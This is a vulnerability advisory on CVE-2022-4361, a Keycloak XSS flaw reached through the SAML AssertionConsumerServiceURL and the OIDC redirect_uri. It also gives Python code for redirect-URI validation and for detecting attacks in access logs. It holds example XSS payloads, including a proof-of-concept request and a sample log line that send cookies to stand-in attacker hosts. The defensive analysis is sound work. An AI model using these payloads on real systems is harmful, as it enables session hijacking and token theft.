CVE-2022-4361
Weakness (CWE)
CVSS Vector (v3.1): AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
- Attack Vector: Network
- Attack Complexity: Low
- Privileges Required: None
- User Interaction: None
- Scope: Changed
- Confidentiality: High
- Integrity: High
- Availability: High
Description
Keycloak, an open-source identity and access management solution, has a cross-site scripting (XSS) vulnerability in the SAML or OIDC providers. The vulnerability can allow an attacker to execute malicious scripts by setting the AssertionConsumerServiceURL value or the redirect_uri.
Comprehensive Technical Analysis of CVE-2022-4361 (Keycloak XSS Vulnerability)
1. Vulnerability Assessment and Severity Evaluation
CVE ID: CVE-2022-4361
CVSS Score: 10.0 (Critical) – AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
Vulnerability Type: Reflected Cross-Site Scripting (XSS) caused by insufficient validation of attacker-controlled URLs in the SAML and OIDC authentication flows.
Severity Justification:
- Attack Vector (AV:N): Exploitable remotely over the network without authentication.
- Attack Complexity (AC:L): Low complexity; no special conditions required.
- Privileges Required (PR:N): No privileges needed; unauthenticated attackers can exploit.
- User Interaction (UI:N): As listed in the vector. Note that every scenario below needs a victim to open an attacker-supplied link, which CVSS normally scores as UI:R; treat the 10.0 figure as an upper bound and check the vendor-assigned score in the NVD entry.
- Scope (S:C): Changes scope; the script runs in the Keycloak origin, but the consequences land on the client applications that trust the realm.
- Confidentiality (C:H), Integrity (I:H), Availability (A:H): High impact on all security objectives as rated.
The practical impact is attacker-controlled script executing in a victim's browser within the Keycloak origin. That is enough for session cookie and token theft, credential phishing on the real login page, and, when the victim is a realm administrator, configuration changes through the admin console. It does not by itself give code execution on the Keycloak server.
2. Potential Attack Vectors and Exploitation Methods
Exploitation Mechanism:
The vulnerability arises from insufficient validation of the AssertionConsumerServiceURL attribute of a SAML AuthnRequest and of the redirect_uri parameter of an OIDC authorization request. Keycloak reflects the attacker-supplied value into an HTML response (for example as the destination of a redirect or an auto-submitted form), so a value such as javascript:... or data:text/html,... executes in the victim's browser, in the Keycloak origin, when the victim opens the crafted link.
Attack Scenarios:
- SAML-Based Exploitation:
  - The attacker builds a SAML AuthnRequest whose AssertionConsumerServiceURL attribute carries the payload. With the HTTP-Redirect binding the request is DEFLATE-compressed, base64-encoded and sent as the SAMLRequest query parameter; with the POST binding it is a base64-encoded form field. There is no separate AssertionConsumerServiceURL query parameter in SAML; the value travels inside the encoded request.
  - When a victim opens the crafted link (e.g., via phishing), the payload executes in their browser.
  - Example AuthnRequest fragment and the resulting request:
    <samlp:AuthnRequest xmlns:samlp="urn:oasis:names:tc:SAML:2.0:protocol" ID="_1" Version="2.0" IssueInstant="2023-01-01T00:00:00Z" AssertionConsumerServiceURL="javascript:alert(document.cookie)"/>
    https://keycloak.example.com/auth/realms/master/protocol/saml?SAMLRequest=<deflated+base64 AuthnRequest>
- OIDC-Based Exploitation:
  - The attacker places the payload in the redirect_uri parameter of an authorization request. Permissive Valid Redirect URIs patterns on the client (for example a wildcard "*" entry) widen the exposure.
  - When the victim opens the link and Keycloak reflects the value, the payload executes.
  - Example payload:
    https://keycloak.example.com/auth/realms/master/protocol/openid-connect/auth?response_type=code&client_id=app&redirect_uri=data:text/html,<script>alert(document.cookie)</script>
- Stored XSS via a Malicious Identity Provider (IdP), a related risk that the published description does not cover:
  - If Keycloak is configured to broker to an external IdP, a rogue IdP could return assertions or tokens containing HTML/JS payloads.
  - Whether those execute depends on where Keycloak or a downstream application renders the values; review this as a configuration risk rather than as part of this CVE.
The /auth path prefix in these URLs applies to the WildFly distribution and to Quarkus deployments started with --http-relative-path=/auth; otherwise the paths start at /realms/.
Post-Exploitation Impact:
- Session Hijacking: Stealing session cookies (KEYCLOAK_SESSION, KEYCLOAK_IDENTITY) to impersonate users. Keycloak marks KEYCLOAK_IDENTITY HttpOnly, so script cannot read it directly, but script running in the Keycloak origin can still drive the authorization endpoint with the victim's cookies attached and obtain tokens that way.
- Privilege Escalation: If an administrator's session is hijacked, the attacker can change realm configuration (add clients, map roles, register identity providers).
- Phishing & Credential Theft: Injecting a fake login form into the genuine login page to harvest credentials.
- Pivot into Relying Parties: Script in the IdP origin can complete authorization flows silently for any client of the realm, so tokens for downstream applications are within reach. There is no direct path from this XSS to code execution on the Keycloak host.
3. Affected Systems and Software Versions
Vulnerable Versions:
- Keycloak versions before 20.0.3 (earlier 20.x, 19.x, 18.x and older releases); verify the fixed release against the upstream Keycloak advisory for CVE-2022-4361 before relying on a specific number.
- Red Hat Single Sign-On (RH-SSO) 7.6 builds that predate the errata for this CVE.
Affected Components:
- The SAML protocol endpoint (AuthnRequest handling) and SAML client configuration.
- The OIDC/OAuth2 authorization endpoint (redirect_uri handling).
- Custom themes or extensions that render SAML/OIDC request values.
Not Affected:
- Keycloak 20.0.3 and later (patched, subject to the same verification).
- Deployments in which the SAML and OIDC protocol endpoints are not reachable by untrusted users.
4. Recommended Mitigation Strategies
Immediate Actions:
- Apply the Patch:
  - Upgrade to Keycloak 20.0.3 or later (preferably the latest supported release).
  - For RH-SSO 7.6, apply the Red Hat errata that lists CVE-2022-4361.
- Temporary Workarounds (if patching is delayed):
  - Input Validation & Sanitization:
    - Tighten every client's Valid Redirect URIs to exact https URLs or narrow prefix patterns and remove wildcard "*" entries; do the same for the assertion consumer service URLs registered on SAML clients.
    - Content Security Policy: a policy that allows 'unsafe-inline' and 'unsafe-eval' gives no protection against injected script, so the commonly suggested header
      Content-Security-Policy: default-src 'self'; script-src 'self' 'unsafe-inline' 'unsafe-eval'; object-src 'none';
      is not a mitigation. A strict, nonce-based script-src would block the payload, but Keycloak's login theme and the SAML POST-binding auto-submit page rely on inline script, so that requires adapting the theme and testing every flow.
  - Disable Unused Protocols:
    - Keep only the protocol (SAML or OIDC) that your clients actually use; remove or disable clients for the other.
  - Network-Level Protections:
    - Deploy a Web Application Firewall (e.g., ModSecurity with OWASP CRS) in front of Keycloak. Note that the SAML AssertionConsumerServiceURL sits inside the deflated, base64-encoded SAMLRequest, so a WAF that does not decode that parameter will only catch the OIDC variant.
- Monitoring & Detection:
  - Log and alert on redirect_uri values and decoded AssertionConsumerServiceURL values that are not absolute http(s) URLs or that contain HTML metacharacters.
  - Feed access logs into a SIEM (e.g., Splunk, ELK) to detect such payloads in authentication requests.
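To make the allowlisting workaround concrete, here is an added example (not Keycloak code, and not from this entry) in Python that contrasts a prefix-style check, the shape of check that lets javascript: and data: values through, with a strict validator of the kind a hardened deployment should enforce before a callback URL is reflected anywhere. The client IDs, registered URIs and function names are constructed for the example; Keycloak's own Valid Redirect URIs logic is Java and differs in detail.

```python
from urllib.parse import unquote, urlsplit

# Hypothetical registered clients and their Valid Redirect URIs (constructed for
# this example; not Keycloak's data model). A trailing "/*" allows any path below
# the prefix; a bare "*" entry means "anything goes".
REGISTERED_REDIRECT_URIS = {
    "app": ["https://app.example.com/callback", "https://app.example.com/oidc/*"],
    "legacy": ["*"],
}
ALLOWED_SCHEMES = {"https"}          # add "http" only for loopback dev clients
FORBIDDEN_CHARS = set('<>"\'\\')     # HTML/JS metacharacters never valid in a callback URL


def weak_is_allowed(client_id, candidate):
    """Prefix-style matching that never looks at the scheme or at the characters
    in the value. A bare "*" pattern or a "/*" prefix lets javascript:, data: and
    markup-bearing values through: the shape of check behind this class of bug."""
    for pattern in REGISTERED_REDIRECT_URIS.get(client_id, []):
        if pattern == "*" or candidate.startswith(pattern.rstrip("*")):
            return True
    return False


def strict_is_allowed(client_id, candidate):
    """Allowlist check a hardened deployment should enforce:
      1. no HTML/JS metacharacters or control characters, even percent-encoded;
      2. absolute URL with an allowed scheme, a host, no userinfo, no fragment;
      3. no path-traversal segments;
      4. exact match, or scheme+host equality plus path prefix for "/*" patterns.
    A bare "*" entry is deliberately never honoured."""
    decoded = unquote(candidate)
    if any(c in FORBIDDEN_CHARS or ord(c) < 0x20 for c in decoded):
        return False
    parts = urlsplit(candidate)
    if parts.scheme.lower() not in ALLOWED_SCHEMES or not parts.netloc:
        return False
    if "@" in parts.netloc or parts.fragment:
        return False
    if ".." in parts.path.split("/"):
        return False
    for pattern in REGISTERED_REDIRECT_URIS.get(client_id, []):
        if pattern.endswith("/*"):
            base = urlsplit(pattern[:-1])     # keep the trailing "/" of the prefix
            same_origin = (parts.scheme.lower(), parts.netloc.lower()) == \
                          (base.scheme.lower(), base.netloc.lower())
            if same_origin and parts.path.startswith(base.path):
                return True
        elif candidate == pattern:
            return True
    return False


if __name__ == "__main__":
    for client, uri in [("legacy", "javascript:alert(document.cookie)"),
                        ("app", "https://app.example.com/oidc/<script>alert(1)</script>"),
                        ("app", "https://app.example.com/oidc/return?state=abc")]:
        print(f"{client:7} weak={weak_is_allowed(client, uri)!s:5} "
              f"strict={strict_is_allowed(client, uri)!s:5} {uri}")
```

The strict check rejects on decoded content first, so a percent-encoded `<script>` is caught even though the raw string contains no metacharacters, and it refuses relative URLs and non-https schemes outright rather than trying to enumerate dangerous ones.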
Long-Term Hardening:
- Regular Security Audits:
- Conduct penetration testing on Keycloak deployments, focusing on SAML/OIDC flows.
- Least Privilege Principle:
- Restrict Keycloak admin access and enforce multi-factor authentication (MFA).
- Secure Development Practices:
- Follow OWASP Secure Coding Guidelines for input validation.
- Use SAML/OIDC libraries with built-in security checks (e.g., OpenSAML, Spring Security).
5. Impact on the Cybersecurity Landscape
Broader Implications:
- Identity & Access Management (IAM) Risks:
- Keycloak is widely used in enterprise IAM, cloud-native applications, and DevOps pipelines. A critical XSS vulnerability in such a system undermines trust in federated authentication.
- Supply Chain Attacks:
- If Keycloak is used as an IdP for third-party services, exploitation could lead to cascading breaches (e.g., compromising multiple SaaS applications).
- Regulatory & Compliance Impact:
- Organizations using Keycloak may face GDPR, HIPAA, or PCI DSS violations if exploited, leading to data breaches and legal penalties.
- Exploitability in the Wild:
  - The attack needs only a crafted link, so it suits phishing campaigns well; this entry cites no public report of in-the-wild exploitation.
Historical Context:
- Keycloak has had earlier issues in the same request-handling paths (e.g., CVE-2020-10770, a server-side request through the OIDC request_uri parameter, and CVE-2021-20323), which is why redirect and callback URL handling deserves regular review.
- Abuse of SAML trust is a recurring pattern in cloud intrusions (e.g., the Golden SAML technique used in the SolarWinds campaign), although that technique relies on a stolen signing key rather than on an XSS.
6. Technical Details for Security Professionals
Root Cause Analysis:
The vulnerability stems from improper handling of user-controlled URLs in:
- SAML: the AssertionConsumerServiceURL attribute of an inbound AuthnRequest, which tells the IdP where to deliver the SAML response.
- OIDC: the redirect_uri parameter of an OAuth2/OIDC authorization request.
Keycloak reflected these values into HTML responses without validating the scheme and without context-appropriate output encoding, so a javascript: or data: URL, or a value containing markup, became executable in the victim's browser.
Proof-of-Concept (PoC) Exploitation:
- SAML XSS Exploitation (the payload lives in the AssertionConsumerServiceURL attribute of the AuthnRequest, which is deflated and base64-encoded into SAMLRequest):
  GET /auth/realms/master/protocol/saml?SAMLRequest=<deflated+base64 AuthnRequest with AssertionConsumerServiceURL="javascript:alert(1)"> HTTP/1.1
  Host: keycloak.example.com
  If Keycloak accepts the request, the payload executes when the response page is rendered.
- OIDC XSS Exploitation:
  GET /auth/realms/master/protocol/openid-connect/auth?response_type=code&client_id=app&redirect_uri=data:text/html,<script>fetch('https://attacker.com/steal?cookie='+document.cookie)</script> HTTP/1.1
  Host: keycloak.example.com
  When the victim's browser follows the link and Keycloak reflects the value, the script executes and exfiltrates whatever cookies are readable to script.
Patch Analysis:
The fix (commit a1cfe6e24e5b34792699a00b8b4a8016a5929e3a) introduces:
- Strict URL validation for AssertionConsumerServiceURL and redirect_uri.
- Output encoding to prevent script execution.
- Additional checks for malformed SAML/OIDC requests.
Detection & Forensics:
- Log Analysis:
  - Keycloak's server log does not record the offending URL in a dedicated message, so start from the reverse proxy or access logs: take the query string of requests to /realms/<realm>/protocol/saml and /realms/<realm>/protocol/openid-connect/auth, base64-decode and inflate SAMLRequest, and look for AssertionConsumerServiceURL or redirect_uri values with a javascript: or data: scheme or containing HTML metacharacters.
  - If Keycloak event logging is enabled, LOGIN_ERROR events typically include the client_id and redirect_uri of rejected requests and are a second source.
- Network Forensics:
  - Inspect SAML/OIDC traffic for encoded payloads (e.g., javascript:, data:text/html), remembering that they may be URL-encoded, double-encoded, or wrapped in the SAML deflate+base64 encoding.
- Endpoint Detection:
  - Monitor for unexpected outbound requests from browsers on Keycloak pages (cookie exfiltration) and for admin console changes that do not correspond to a change ticket.
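As an added example (not part of this entry and not Keycloak's code), the following Python detector implements the log-analysis step above: it reads access-log request lines, decodes the SAML Redirect-binding SAMLRequest (base64, then raw DEFLATE) to recover the AssertionConsumerServiceURL attribute, reads redirect_uri from OIDC authorization requests, and flags values that are not absolute http(s) URLs or that contain HTML metacharacters. The log lines, IP addresses and URLs are constructed sample data; the small encoder is there only to build them.

```python
import base64
import re
import zlib
import xml.etree.ElementTree as ET
from urllib.parse import parse_qs, quote, unquote, urlsplit
from xml.sax.saxutils import quoteattr

SAML_NS = "urn:oasis:names:tc:SAML:2.0:protocol"
# Matches both the legacy /auth/realms/... and the Quarkus-era /realms/... paths.
ENDPOINT = re.compile(r"^/(?:auth/)?realms/[^/]+/protocol/(saml|openid-connect/auth)$")
REQUEST_LINE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(?:GET|POST) (\S+) HTTP/[\d.]+"')
HTML_META = re.compile(r'[<>"\'\\]')


def encode_saml_request(acs_url):
    """Build a minimal AuthnRequest carrying the given AssertionConsumerServiceURL
    and encode it the way the HTTP-Redirect binding does (raw DEFLATE, then base64).
    Used here only to construct the sample log lines."""
    xml = (f'<samlp:AuthnRequest xmlns:samlp="{SAML_NS}" ID="_r1" Version="2.0" '
           f'IssueInstant="2023-01-01T00:00:00Z" '
           f'AssertionConsumerServiceURL={quoteattr(acs_url)}/>')
    comp = zlib.compressobj(9, zlib.DEFLATED, -15)
    return base64.b64encode(comp.compress(xml.encode()) + comp.flush()).decode()


def acs_url_from_saml_request(value):
    """Reverse the Redirect binding and return the ACS URL attribute of the
    AuthnRequest, or None if the value is not a decodable request.
    (The data is attacker-controlled; use defusedxml for production parsing.)"""
    try:
        xml_bytes = zlib.decompress(base64.b64decode(value), -15)
        root = ET.fromstring(xml_bytes)
    except (ValueError, zlib.error, ET.ParseError):
        return None
    if root.tag != f"{{{SAML_NS}}}AuthnRequest":
        return None
    return root.get("AssertionConsumerServiceURL")


def is_suspicious_url(url):
    """A callback/ACS URL is suspicious if it is not an absolute http(s) URL or if it
    contains HTML/JS metacharacters after one more round of percent-decoding (on top
    of the query-string decoding already done), which catches double-encoded payloads."""
    if url is None:
        return False
    decoded = unquote(url)
    if urlsplit(decoded).scheme.lower() not in ("http", "https"):
        return True
    return HTML_META.search(decoded) is not None


def scan_access_log(lines):
    """Return one finding per request whose ACS URL or redirect_uri looks like an
    XSS payload: client IP, endpoint path, parameter name and decoded value."""
    findings = []
    for line in lines:
        m = REQUEST_LINE.match(line)
        if not m:
            continue
        client_ip, target = m.groups()
        parts = urlsplit(target)
        ep = ENDPOINT.match(parts.path)
        if not ep:
            continue
        params = parse_qs(parts.query, keep_blank_values=True)
        if ep.group(1) == "saml":
            candidates = [("AssertionConsumerServiceURL", acs_url_from_saml_request(v))
                          for v in params.get("SAMLRequest", [])]
        else:
            candidates = [("redirect_uri", v) for v in params.get("redirect_uri", [])]
        for name, value in candidates:
            if is_suspicious_url(value):
                findings.append({"ip": client_ip, "endpoint": parts.path,
                                 "param": name, "value": unquote(value)})
    return findings


# Constructed sample log lines in common log format (not real traffic).
SAMPLE_LOG = [
    '10.0.0.5 - - [01/Jan/2023:10:00:00 +0000] "GET /realms/master/protocol/saml?SAMLRequest='
    + quote(encode_saml_request("https://sp.example.com/saml/acs")) + ' HTTP/1.1" 302 0',
    '198.51.100.7 - - [01/Jan/2023:10:00:01 +0000] "GET /realms/master/protocol/saml?SAMLRequest='
    + quote(encode_saml_request("javascript:alert(document.cookie)")) + ' HTTP/1.1" 200 1024',
    '10.0.0.6 - - [01/Jan/2023:10:00:02 +0000] "GET /realms/master/protocol/openid-connect/auth'
    '?response_type=code&client_id=app&redirect_uri='
    + quote("https://app.example.com/callback", safe="") + ' HTTP/1.1" 200 2048',
    '198.51.100.7 - - [01/Jan/2023:10:00:03 +0000] "GET /realms/master/protocol/openid-connect/auth'
    '?response_type=code&client_id=app&redirect_uri='
    + quote("data:text/html,<script>fetch('https://attacker.example/?c='+document.cookie)</script>", safe="")
    + ' HTTP/1.1" 200 2048',
    '10.0.0.8 - - [01/Jan/2023:10:00:04 +0000] "GET /realms/master/account HTTP/1.1" 200 4096',
]

if __name__ == "__main__":
    for f in scan_access_log(SAMPLE_LOG):
        print(f"{f['ip']} {f['endpoint']} {f['param']}={f['value']!r}")
```

Run against the sample, the scanner reports the two requests from 198.51.100.7 and nothing for the benign SAML, OIDC and account-page lines. Because the SAML value is recovered from inside SAMLRequest rather than grepped from the raw query string, the same logic works for the POST binding if you feed it the decoded form field instead.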
Conclusion & Recommendations
CVE-2022-4361 is a critical XSS vulnerability in Keycloak that poses severe risks to organizations relying on federated authentication. Due to its low attack complexity, unauthenticated exploitation, and high impact, immediate patching is mandatory.
Key Takeaways for Security Teams:
✅ Patch immediately to Keycloak 20.0.3 or later.
✅ Enforce strict input validation for SAML/OIDC parameters.
✅ Deploy WAF rules to block malicious authentication requests.
✅ Monitor for exploitation attempts via SIEM and log analysis.
✅ Conduct a security audit of Keycloak deployments to identify misconfigurations.
Failure to mitigate this vulnerability could result in session hijacking, privilege escalation within the realm, and compromise of every application that relies on it for authentication, making it a top priority for remediation.